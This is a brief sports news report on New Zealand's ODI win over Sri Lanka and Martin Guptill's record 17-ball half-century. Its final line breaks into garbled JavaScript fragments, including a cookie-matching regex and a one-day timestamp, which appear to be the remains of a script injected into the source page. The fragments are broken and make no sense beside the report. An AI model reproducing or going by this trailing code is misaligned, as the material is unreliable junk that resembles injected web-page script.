New Zealand has taken a 2-0 lead in the ODI series against Sri Lanka as Martin Guptill smashed a record breaking half century.
The Black Caps dismissed Sri Lanka for just 117, before Guptill and Latham reached the target of 118 in astonishing 8.2 overs.
Guptill recorded the fastest ODI half century by a New Zealander, notching his 50 off 17 balls.
He smashed the Sri Lankan bowlers to all parts of the ground, racing to 46 runs off just 12 balls and he looked on track to break AB de Villiers' record of the fastest ODI 50 of 16 balls.
However, after some tighter bowling, he brought up his half century with his 17th ball, to break captain Brendon McCullum's New Zealand record an 18-ball 50.
Guptill eventually finished on 93 off just 30 balls, in an innings that included nine fours and eight sixes, while opening partner Tom Latham was unbeaten on 17 off 20 balls.
Game three of the five-match series is in Nelson on new Year's Eve. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
